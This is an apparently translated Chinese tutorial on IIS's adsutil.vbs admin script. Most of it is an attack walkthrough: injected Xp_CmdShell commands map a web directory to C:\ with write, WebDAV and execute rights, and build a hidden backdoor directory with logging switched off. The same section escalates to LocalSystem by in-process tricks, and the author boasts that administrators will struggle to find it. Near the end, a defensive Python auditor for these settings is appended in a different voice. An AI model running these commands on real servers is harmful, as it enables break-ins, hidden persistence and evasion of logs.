2025-02-24 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)06/03 Report--
This article introduces the use of adsutil.vbs in scripting attacks. It is quite detailed and has some reference value; readers who are interested should read it to the end.
1. Brief introduction
What is adsutil.vbs? Any administrator who has used IIS will know it. It is a script that ships with IIS for managing IIS from the command line, located in the %SystemDrive%\Inetpub\AdminScripts directory. It is a full 95426 bytes; a script that large is bound to be powerful, and it is. I think of it as the "Internet Information Services Manager" of the command line. (In fact, on Windows 2000 servers there were more than twenty .vbs management scripts under %SystemDrive%\Inetpub\AdminScripts; by Windows Server 2003 adsutil.vbs was the only one left, which shows how much it does.)
When talking about adsutil.vbs, MetaBase.bin has to be mentioned. This file is the most important configuration file of IIS: every IIS setting is ultimately stored in it, and both IIS Manager and adsutil.vbs read their configuration information from it. MetaBase.bin is structured very much like the registry, as a tree. IIS Manager and adsutil.vbs address nodes in MetaBase.bin through an ADsPath. The path starts with IIS://, where LocalHost stands for the local server and w3svc for the web service. For example, IIS://LocalHost/w3svc/1 is the first web site on the local server, and IIS://LocalHost/w3svc/1/root/Vdir is the virtual directory Vdir under the root of the first web site.
With this background, let's get back to adsutil.vbs and look at its usage:
C:\Inetpub\AdminScripts>cscript adsutil.vbs   // don't forget to name the script host, cscript.exe
Microsoft (R) Windows Script Host Version 5.6
Copyright (C) Microsoft Corporation 1996-2001. All rights reserved.
Usage:
ADSUTIL.VBS <cmd> [<path> [<value>]]
Description:
IIS administration utility that enables the configuration of metabase properties.
Supported Commands:   // the supported commands; this is the most important part
GET, SET, ENUM, DELETE, CREATE, COPY
APPCREATEINPROC, APPCREATEOUTPROC, APPCREATEPOOLPROC, APPDELETE, APPUNLOAD, APPGETSTATUS
Samples:   // a few simple examples
Adsutil.vbs GET W3SVC/1/ServerBindings   // show the port binding of the first web site. W3SVC/1 is short for IIS://LocalHost/W3SVC/1, and ServerBindings is one of its properties; same below.
Adsutil.vbs SET W3SVC/1/ServerBindings ":81:"   // bind the first web site to port 81
Adsutil.vbs CREATE W3SVC/1/Root/MyVdir "IIsWebVirtualDir"   // create a virtual directory MyVdir under the root of the first web site; "IIsWebVirtualDir" is the directory (key) type
Adsutil.vbs START_SERVER W3SVC/1   // start the first web site
Adsutil.vbs ENUM /P W3SVC   // list all IIS sites
For Extended Help type:
Adsutil.vbs HELP   // type this if you want more help. I won't reproduce it here (so nobody says I'm padding for the fee); look for yourself.
The text after "//" above is comments I added (same below). I believe everyone can follow this.
The commonly used adsutil.vbs commands are GET, SET, ENUM, DELETE and CREATE. Let me explain them one by one:
GET is normally used to view one property value of a directory. SET sets a directory property. ENUM also views properties, but it displays every property that has been set at once; the output for one directory usually runs to several screens. It has an optional "/P" switch: with it, ENUM only lists the virtual directories under the given directory. DELETE removes a virtual directory, and CREATE creates one. There are also START_SERVER, STOP_SERVER, PAUSE_SERVER and CONTINUE_SERVER, which start, stop, pause and resume a virtual site.
The properties of a virtual directory look roughly like this (I only list the ones we might use; the full output would be too long):
KeyType: (STRING) "IIsWebVirtualDir"   // directory type; (STRING) marks a string-typed property
AppRoot: (STRING) "/LM/W3SVC/1/ROOT"   // IIS path of the directory
AppFriendlyName: (STRING) "Default Application"   // application name
AppIsolated: (INTEGER) 2   // whether the application runs out of process or in process; a numeric property
HttpCustomHeaders: (LIST) (1 Items)   // custom IIS response headers
"Powered By: www.WoFeiWo.Info"
HttpErrors: (LIST) (42 Items)   // pages returned for the various HTTP status codes; you can set them yourself. Omitted here.
DefaultDoc: (STRING) "Default.htm,index.htm,Default.asp,index.asp,Default.php,index.php,Default.aspx,index.aspx"   // default document names for the directory
Path: (STRING) "D:\ftp"   // physical path the directory actually maps to
AccessFlags: (INTEGER) 513   // I don't know what this is; I never set it, it seems to be set automatically
AccessExecute: (BOOLEAN) False   // execute permission on the directory; a Boolean value
AccessSource: (BOOLEAN) False   // whether WebDAV access to the directory is allowed
AccessRead: (BOOLEAN) True   // read permission on the directory
AccessWrite: (BOOLEAN) False   // write permission on the directory
AccessScript: (BOOLEAN) True   // whether scripts may run in the directory
AccessNoRemoteExecute: (BOOLEAN) False
AccessNoRemoteRead: (BOOLEAN) False
AccessNoRemoteWrite: (BOOLEAN) False
AccessNoRemoteScript: (BOOLEAN) False
AccessNoPhysicalDir: (BOOLEAN) False
ScriptMaps: (LIST) (27 Items)   // application extension mappings
".asa,C:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE"
".asp,C:\WINDOWS\system32\inetsrv\asp.dll,5,GET,HEAD,POST,TRACE"
".aspx,C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll,1,GET,HEAD,POST,DEBUG"
...   // many more entries omitted here
AspEnableParentPaths: (BOOLEAN) True
AppPoolId: (STRING) "DefaultAppPool"   // application pool name
DontLog: (BOOLEAN) True   // suppress IIS logging for this directory
DirBrowseFlags: (INTEGER) -1073741762
EnableDirBrowsing: (BOOLEAN) True   // whether directory listing is allowed
DirBrowseShowDate: (BOOLEAN) True   // this and the following are display settings for directory listings; the English is self-explanatory, so I won't say more
DirBrowseShowTime: (BOOLEAN) True
DirBrowseShowSize: (BOOLEAN) True
DirBrowseShowExtension: (BOOLEAN) True
DirBrowseShowLongDate: (BOOLEAN) True
EnableDefaultDoc: (BOOLEAN) True   // whether the default document is enabled
This is what I saw on my machine with the command cscript adsutil.vbs ENUM w3svc/1/root. You can run it yourself and study the output.
All of the properties above can be set with the SET command, like this:
cscript adsutil.vbs SET w3svc/1/root/<directory name>/<property name> <value>
For example, cscript adsutil.vbs SET w3svc/1/root/wofeiwo/AccessRead 1   // sets the read permission of the virtual directory wofeiwo under the first web site to True
Or: cscript adsutil.vbs SET w3svc/1/root/wofeiwo/Path "C:\"   // sets the physical path the directory maps to "C:\"
Let's look at a simple example of using it.
2. Using adsutil.vbs
(1) A new idea for uploading via MSSQL injection
You may run into this situation in MSSQL injection: you have SA privileges and can run commands (xp_cmdshell, sp_OACreate, jobs, and so on), but the server sits on an intranet behind a bastion host, and only port 80 is forwarded. 3389 is useless (the intranet cannot be reached), and none of the usual ways of fetching a reverse-connecting backdoor (TFTP, FTP, wget, exe2bat, and so on) work. What do you do?
Brother Amanl's classic "Squeeze the Last Drop out of MSSQL" gives a good idea: use the VBS scripts under %SystemDrive%\Inetpub\AdminScripts to create a new virtual directory and point its mapping at an absolute path of your choosing. That removes the need to guess the absolute path of the web root. Then you can get a shell by writing the database or a temporary table into the virtual directory with BACKUP or MAKEWEBTASK (or simply with echo).
The idea is good, but anyone who has used GetWebShell (by "stinky beggar") or Xiaozhu's NBUpFile knows how low the success rate of BACKUP and MAKEWEBTASK is. And echo... I'd rather not talk about it: writing one line at a time is simply asking for pain (and you have to keep escaping special characters).
In fact, we can improve on Brother Amanl's idea. When creating the new virtual directory, we can give it write permission, plus WebDAV... then won't we be able to upload any file directly through IIS, and not just text files? If we upload a reverse-connecting backdoor and run it via SA... everything is done!
Let's put it into practice right away:
Exec Master..Xp_CmdShell 'Cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs CREATE w3svc/1/Root/wofeiwo "IIsWebVirtualDir"';--
Exec Master..Xp_CmdShell 'Cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs SET w3svc/1/Root/wofeiwo/Path "C:\"';--
Note that you have to escape the special characters above yourself. Alternatively, use NBSI2 or SQLCOMM to run the commands above.
So we have created a virtual directory wofeiwo under the first web site and mapped it to the root of C:. I gave it read and write permission, and, in order to get a webshell, script execution permission as well:
Exec Master..Xp_CmdShell 'Cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessRead 1';--
Exec Master..Xp_CmdShell 'Cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessWrite 1';--
Exec Master..Xp_CmdShell 'Cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessScript 1';--
Readers who have seen Superhei's "Exploiting IIS write permission" may want to craft their own HTTP requests to upload files. There is actually a simpler way:
Exec Master..Xp_CmdShell 'Cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs SET w3svc/1/Root/wofeiwo/EnableDirBrowsing 1';--
Exec Master..Xp_CmdShell 'Cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs SET w3svc/1/Root/wofeiwo/AccessSource 1';--
With directory listing and WebDAV access allowed, open IE, press Ctrl+O, type the address of the virtual directory you just created into the Open dialog, tick "Open as Web Folder" and confirm. As shown in the figure:
Figure 1
Ah, do you see all the folders? As shown in the figure:
Figure 2
Now you can work with these files as if they were in an ordinary folder, copying with Ctrl+C and Ctrl+V, which gives a convenient way to upload and modify files.
(2) Going further
In fact we can go one step further and use the ideas above to build an IIS backdoor directly. Come on, let's see what I can do! (The method is the one described by "moving shark" in "The Near-Perfect IIS Backdoor", except that I do the setup directly with adsutil.vbs, a tool that ships with Windows. Interested readers can find that article themselves.)
Exec Master..Xp_CmdShell 'Cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs CREATE w3svc/1/Root/wofeiwo "IIsWebVirtualDir"';--   // first create a wofeiwo directory
Exec Master..Xp_CmdShell 'Cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs CREATE w3svc/1/Root/wofeiwo/door "IIsWebVirtualDir"';--   // then create a door directory under wofeiwo
Exec Master..Xp_CmdShell 'Cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs SET w3svc/1/Root/wofeiwo/door/Path "C:\"';--   // map the door directory to the root of C:
Exec Master..Xp_CmdShell 'Cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessRead 1';--   // this and the following lines set permissions on the directory; see the command comments above
Exec Master..Xp_CmdShell 'Cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessWrite 1';--
Exec Master..Xp_CmdShell 'Cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessScript 1';--
Exec Master..Xp_CmdShell 'Cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs SET w3svc/1/Root/wofeiwo/door/DontLog 1';--
Exec Master..Xp_CmdShell 'Cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs SET w3svc/1/Root/wofeiwo/door/EnableDirBrowsing 1';--
Exec Master..Xp_CmdShell 'Cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessSource 1';--
Exec Master..Xp_CmdShell 'Cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AccessExecute 1';--
Some people may say: what? Isn't this the same as above? Hehe. Look closer: the first directory we created, "wofeiwo", has no "Path" property set, which means it is not mapped to any real directory. This makes use of an IIS flaw (involving IIS5.0.1.0): a virtual directory without a "Path" property does not appear in IIS Manager, so it is effectively a hidden directory. The virtual directory "door" beneath it is invisible too, because its parent is not shown! But "door" does have "Path" set, so requesting the path http://IP/wofeiwo/door/ returns the file listing of C:. This directory is now a place where we can read and write files at will, and we can also run programs from the System32 directory. Our backdoor has taken shape. (Note that I added the AccessExecute permission here.)
But the programs we run now still have only the Guest privileges of IIS's default IUSR account, and we are always unhappy about not having more. Let's raise our privileges. Leaving aside simply adding the IUSR user to the Administrators group, here are two other methods:
1. Set AppIsolated so that the application in this directory runs inside the IIS process, inheriting IIS's System privileges.
Exec Master..Xp_CmdShell 'Cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs SET w3svc/1/Root/wofeiwo/door/AppIsolated 0';--
2. Add asp.dll, which parses ASP files, to IIS's list of privileged in-process DLLs so that it runs inside the IIS process and thereby gets IIS's LocalSystem privileges.
1) First get all of IIS's privileged in-process DLLs:
Exec Master..Xp_CmdShell 'Cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs GET w3svc/InProcessIsapiApps';--
Return:
InProcessIsapiApps: (LIST) (5 Items)
"C:\WINDOWS\system32\inetsrv\httpext.dll"
"C:\WINDOWS\system32\inetsrv\httpodbc.dll"
"C:\WINDOWS\system32\inetsrv\ssinc.dll"
"C:\WINDOWS\system32\msw3prt.dll"
"C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll"
2) Add asp.dll to the InProcessIsapiApps list. Note that all the DLLs found above must be given again, otherwise they are removed from the list.
Exec Master..Xp_CmdShell 'Cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs SET w3svc/InProcessIsapiApps "C:\WINDOWS\system32\inetsrv\httpext.dll" "C:\WINDOWS\system32\inetsrv\httpodbc.dll" "C:\WINDOWS\system32\inetsrv\ssinc.dll" "C:\WINDOWS\system32\msw3prt.dll" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll" "C:\WINDOWS\system32\inetsrv\asp.dll"';--
Return:
InProcessIsapiApps: (LIST) "C:\WINDOWS\system32\inetsrv\httpext.dll" "C:\WINDOWS\system32\inetsrv\httpodbc.dll" "C:\WINDOWS\system32\inetsrv\ssinc.dll" "C:\WINDOWS\system32\msw3prt.dll" "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll" "C:\WINDOWS\system32\inetsrv\asp.dll"
That's it. From now on, every ASP file runs with LocalSystem privileges. After the steps above, our IIS backdoor is essentially in place, and you can upload an ASP trojan for additional control. A backdoor set up this way is very hard for the administrator to find: it communicates entirely over IIS's port 80 and leaves no log entries, so it is fairly safe.
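Every setting this backdoor depends on is visible in the same adsutil.vbs output shown earlier in the article, so an administrator can audit for it. The script below is an added example, not code from the article or from IIS: it parses saved output of cscript adsutil.vbs ENUM w3svc/1/root/<vdir> and of cscript adsutil.vbs GET w3svc/InProcessIsapiApps (the "Name : (TYPE) value" format shown above, with LIST items on their own quoted lines) and flags a virtual directory with no Path (hidden from IIS Manager), a Path that maps a drive root, AccessWrite combined with AccessSource (WebDAV write), AccessExecute, EnableDirBrowsing, DontLog, AppIsolated 0, and any in-process ISAPI DLL beyond the five the article's GET output lists. The three sample dumps are constructed to mirror the article's "wofeiwo", "door" and InProcessIsapiApps listings; the baseline DLL set is an assumption taken from that listing rather than from any IIS documentation.

```python
import re

# adsutil.vbs prints one property per line as   Name : (TYPE) value
# followed, for LIST properties, by one quoted item per line.
PROP_RE = re.compile(r'^(\w+)\s*:\s*\((\w+)\)\s*(.*)$')


def parse_adsutil(text):
    """Parse saved adsutil.vbs ENUM/GET output into a {name: value} dict.
    BOOLEAN -> bool, INTEGER -> int, STRING -> str without quotes,
    LIST -> list of the quoted items on the following lines."""
    props, current_list = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = PROP_RE.match(line)
        if m is None:
            if current_list is not None and line.startswith('"'):
                current_list.append(line.strip('"'))
            continue
        name, typ, val = m.groups()
        current_list = None
        if typ == 'BOOLEAN':
            props[name] = val.strip().lower() == 'true'
        elif typ == 'INTEGER':
            props[name] = int(val.strip())
        elif typ == 'STRING':
            props[name] = val.strip().strip('"')
        elif typ == 'LIST':
            current_list = props[name] = []
        else:
            props[name] = val.strip()
    return props


# Assumed baseline: the DLLs the article's GET output shows in
# InProcessIsapiApps before asp.dll was added (compared case-insensitively).
BASELINE_INPROC = {
    r'c:\windows\system32\inetsrv\httpext.dll',
    r'c:\windows\system32\inetsrv\httpodbc.dll',
    r'c:\windows\system32\inetsrv\ssinc.dll',
    r'c:\windows\system32\msw3prt.dll',
    r'c:\windows\microsoft.net\framework\v1.1.4322\aspnet_isapi.dll',
}


def audit_vdir(props):
    """Return findings for one virtual directory: the settings the article's
    backdoor relies on, plus a directory that IIS Manager would not show."""
    findings = []
    if props.get('KeyType') == 'IIsWebVirtualDir' and 'Path' not in props:
        findings.append('no Path property: hidden from IIS Manager')
    path = props.get('Path', '')
    if re.fullmatch(r'[A-Za-z]:\\?', path):
        findings.append('Path maps the root of drive ' + path[:2])
    if props.get('AccessWrite') and props.get('AccessSource'):
        findings.append('AccessWrite + AccessSource: WebDAV write access')
    elif props.get('AccessWrite'):
        findings.append('AccessWrite: clients can write to the mapped path')
    if props.get('AccessExecute'):
        findings.append('AccessExecute: executables run from this directory')
    if props.get('EnableDirBrowsing'):
        findings.append('EnableDirBrowsing: directory listing enabled')
    if props.get('DontLog'):
        findings.append('DontLog: requests to this directory are not logged')
    if props.get('AppIsolated') == 0:
        findings.append('AppIsolated=0: application runs inside the IIS process')
    return findings


def audit_inproc(props):
    """Return InProcessIsapiApps entries that are not in the baseline set."""
    return [d for d in props.get('InProcessIsapiApps', [])
            if d.lower() not in BASELINE_INPROC]


# Constructed samples modelled on the article's listings (not real server output).
SAMPLE_DOOR = r'''
KeyType                         : (STRING) "IIsWebVirtualDir"
Path                            : (STRING) "C:\"
AccessRead                      : (BOOLEAN) True
AccessWrite                     : (BOOLEAN) True
AccessScript                    : (BOOLEAN) True
AccessExecute                   : (BOOLEAN) True
AccessSource                    : (BOOLEAN) True
EnableDirBrowsing               : (BOOLEAN) True
DontLog                         : (BOOLEAN) True
AppIsolated                     : (INTEGER) 0
'''
SAMPLE_PARENT = r'''
KeyType                         : (STRING) "IIsWebVirtualDir"
AccessRead                      : (BOOLEAN) True
'''
SAMPLE_INPROC = r'''
InProcessIsapiApps              : (LIST) (6 Items)
  "C:\WINDOWS\system32\inetsrv\httpext.dll"
  "C:\WINDOWS\system32\inetsrv\httpodbc.dll"
  "C:\WINDOWS\system32\inetsrv\ssinc.dll"
  "C:\WINDOWS\system32\msw3prt.dll"
  "C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_isapi.dll"
  "C:\WINDOWS\system32\inetsrv\asp.dll"
'''

if __name__ == '__main__':
    for label, dump in (('wofeiwo', SAMPLE_PARENT), ('wofeiwo/door', SAMPLE_DOOR)):
        for finding in audit_vdir(parse_adsutil(dump)):
            print('%-14s %s' % (label, finding))
    for dll in audit_inproc(parse_adsutil(SAMPLE_INPROC)):
        print('in-process     non-baseline ISAPI DLL: ' + dll)
```

Because the hidden parent directory has no Path, it never shows up in IIS Manager, so the check has to come from the metabase itself: run ENUM /P over each site's root to list every virtual directory, then ENUM each one and feed the output to audit_vdir. Any DontLog directory is worth examining on its own, since its requests will be absent from the IIS logs the defender would otherwise rely on.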
That is all of "What is the use of adsutil.vbs in scripting attacks?" Thank you for reading! I hope the content is helpful; for more related knowledge, follow the industry information channel.